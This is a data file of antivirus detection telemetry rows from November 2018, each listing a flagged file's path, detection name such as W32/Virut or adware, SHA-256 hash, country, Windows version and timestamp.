  Row(detection=Row(filename='fvdxrjcm.exe', filepath='F:\\RECYCLER\\S-7-4-07-3262740328-8645573582-664574467-6068\\FvdXRJcM.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='07b87ade61aa3f13cba28a0c3adb65ae54116d76148b3fc9252519fea4a8d47d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T11:23:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fvdxrjcm.exe', filepath='\\\\?\\F:\\RECYCLER\\S-7-4-07-3262740328-8645573582-664574467-6068\\FvdXRJcM.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='07b87ade61aa3f13cba28a0c3adb65ae54116d76148b3fc9252519fea4a8d47d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:24:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fvdxrjcm.exe', filepath='F:\\RECYCLER\\S-7-4-07-3262740328-8645573582-664574467-6068\\FvdXRJcM.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='07b87ade61aa3f13cba28a0c3adb65ae54116d76148b3fc9252519fea4a8d47d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T10:16:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fvdxrjcm.exe', filepath='F:\\RECYCLER\\S-7-4-07-3262740328-8645573582-664574467-6068\\FvdXRJcM.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='07b87ade61aa3f13cba28a0c3adb65ae54116d76148b3fc9252519fea4a8d47d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T10:16:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=6144000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='07c11b66336d0198a9145e55da554b323bac24812d95b2352092957aaf1d168b', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T05:02:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='07c59e235f5bfee95665a1877145bd9ee84f0f9ea8bf3a77bf33d1bc3e92c4ce', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\07C59E235F5BFEE95665A1877145BD9EE84F0F9EA8BF3A77BF33D1BC3E92C4CE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='07c59e235f5bfee95665a1877145bd9ee84f0f9ea8bf3a77bf33d1bc3e92c4ce', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:56:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='07c59e235f5bfee95665a1877145bd9ee84f0f9ea8bf3a77bf33d1bc3e92c4ce', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\07C59E235F5BFEE95665A1877145BD9EE84F0F9EA8BF3A77BF33D1BC3E92C4CE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='07c59e235f5bfee95665a1877145bd9ee84f0f9ea8bf3a77bf33d1bc3e92c4ce', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:20:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='07c59e235f5bfee95665a1877145bd9ee84f0f9ea8bf3a77bf33d1bc3e92c4ce', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\07C59E235F5BFEE95665A1877145BD9EE84F0F9EA8BF3A77BF33D1BC3E92C4CE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='07c59e235f5bfee95665a1877145bd9ee84f0f9ea8bf3a77bf33d1bc3e92c4ce', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:14:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-073213-26c1f022', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-073213-26C1F022', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='07c59e235f5bfee95665a1877145bd9ee84f0f9ea8bf3a77bf33d1bc3e92c4ce', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wscollect.exe', filepath='\\\\?\\E:\\Windows.old\\WINDOWS\\System32\\WSCollect.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='07d15e34c5bbf07f87a525ff028c0b54c1c67f9f377e5d126bd2d77b9c018e02', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:57:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-213213-3609c1f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e5115e9e\\AVSCAN-20181102-213126-2D71625F\\AVSCAN-20181102-213213-3609C1F2', filesize=448000, name='Adware/FileTour.wry.#M1.#R1'), hash='07f5273a5ad4248030d732407f1a18edbadb1a63d281200a63e09b75c30185eb', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3721032, timestamp='2018-11-02T22:32:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-213213-3609c1f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e5115e9e\\AVSCAN-20181102-213126-2D71625F\\AVSCAN-20181102-213213-3609C1F2', filesize=448000, name='Adware/FileTour.wry.#M1.#R1'), hash='07f5273a5ad4248030d732407f1a18edbadb1a63d281200a63e09b75c30185eb', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:31:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-003449-0a21f812', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0b12a170\\AVSCAN-20181103-003404-01CB9A8E\\AVSCAN-20181103-003449-0A21F812', filesize=448000, name='Adware/FileTour.wry.#M1.#R1'), hash='07f5273a5ad4248030d732407f1a18edbadb1a63d281200a63e09b75c30185eb', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:33:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='t0.ax', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\FileZilla Server\\07 948\\t0.ax', filesize=448000, name='Adware/FileTour.wry.#M1.#R1'), hash='07f5273a5ad4248030d732407f1a18edbadb1a63d281200a63e09b75c30185eb', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:12:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='webbooster@iminent.com.xpi', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Datos antiguos de Firefox\\jykvzqpm.default-1372182658215\\Extensions\\webbooster@iminent.com.xpi', filesize=612000, name='Adware/Iminent.qua.#M1.#R1'), hash='080658eab8e145bf98fe4ca8ce442937c4cbefed0973abb2d60146390f2588e7', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:16:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='webbooster@iminent.com.xpi', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Datos antiguos de Firefox\\jykvzqpm.default-1372182658215\\Extensions\\webbooster@iminent.com.xpi', filesize=612000, name='Adware/Iminent.qua.#M1.#R1'), hash='080658eab8e145bf98fe4ca8ce442937c4cbefed0973abb2d60146390f2588e7', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:16:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdfplus.exe', filepath='C:\\Program Files\\Nuance\\PDF Viewer Plus\\bin\\PDFPlus.exe', filesize=3840000, name='W32/Virut.Gen.#M0.#R0'), hash='080aaa7c0cd8474ba5e091586e7485550ce444be98bd5c0795039ab27125a01d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T11:57:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdfplus.exe', filepath='C:\\Program Files\\Nuance\\PDF Viewer Plus\\bin\\PDFPlus.exe', filesize=3840000, name='W32/Virut.Gen.#M0.#R0'), hash='080aaa7c0cd8474ba5e091586e7485550ce444be98bd5c0795039ab27125a01d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T11:57:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdfplus.exe', filepath='C:\\Program Files\\Nuance\\PDF Viewer Plus\\bin\\PDFPlus.exe', filesize=3840000, name='W32/Virut.Gen.#M0.#R0'), hash='080aaa7c0cd8474ba5e091586e7485550ce444be98bd5c0795039ab27125a01d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T11:57:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100319-618c7cdf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-100319-618C7CDF', filesize=512000, name='TR/NSIS.13284.#M1.#R1'), hash='0814b284359a33955dc2a65301bcdf56911a3032ed96415488dfcb6c2c2cbb04', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:05:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='c13e657201f971525f3e332ed19709e08761e44b', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\c13e657201f971525f3e332ed19709e08761e44b', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='0881009cce1aee3cc0b77a43b743abd2873b22b9dff2b397538854c8b47ffce1', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:55:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='abrites commander for psa.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ABRITES software for ID 172243\\PSA\\ABRITES Commander for PSA.exe', filesize=92672000, name='HEUR/AGEN.1012527.#M1.#R1'), hash='08810113aa05e16e0e08bf44d1b069f97c2277c2f892be5a3f04a6b05fa61391', metadata=Row(cmdline=None, country='IE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:37:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='launcher.dll', filepath='C:\\Program Files\\Counter-Strike Global Offensive\\bin\\launcher.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='08e6099e78d1848a4f52d30426dfde4b17042aee209e4c87ec2ff0a284526fc1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T16:35:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0116533.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0116533.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0125996.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0125996.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0119624.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0119624.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0128506.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0128506.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0119532.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0119532.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0125811.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0125811.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0125904.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0125904.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0118534.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0118534.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0122721.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0122721.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0127316.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0127316.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0113233.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0113233.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0127182.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0127182.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0113331.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0113331.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0115529.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0115529.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0115436.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0115436.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0119723.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0119723.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0123720.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0123720.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0126997.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0126997.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0127090.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0127090.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0117533.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0117533.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0114436.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0114436.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0121722.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0121722.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0113434.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0113434.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0123812.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0123812.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0124810.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0124810.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0127409.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0127409.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='upgradedownload.exe', filepath='h:\\android\\advan s4k\\upgradedownload_r2.9.9008\\bin\\UpgradeDownload.exe', filesize=1536000, name='TR/Patched.Gen.#M300.#R3367'), hash='0931323160a5c5c8ad68bd8d2213894d1503a31d5aca848c74b53053bb2a45ce', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:06:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184522-0499bd94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-184522-0499BD94', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:45:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181351-c1db2d9e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-181351-C1DB2D9E', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:13:50Z'), dt=datetime.date(2018, 11, 2)),
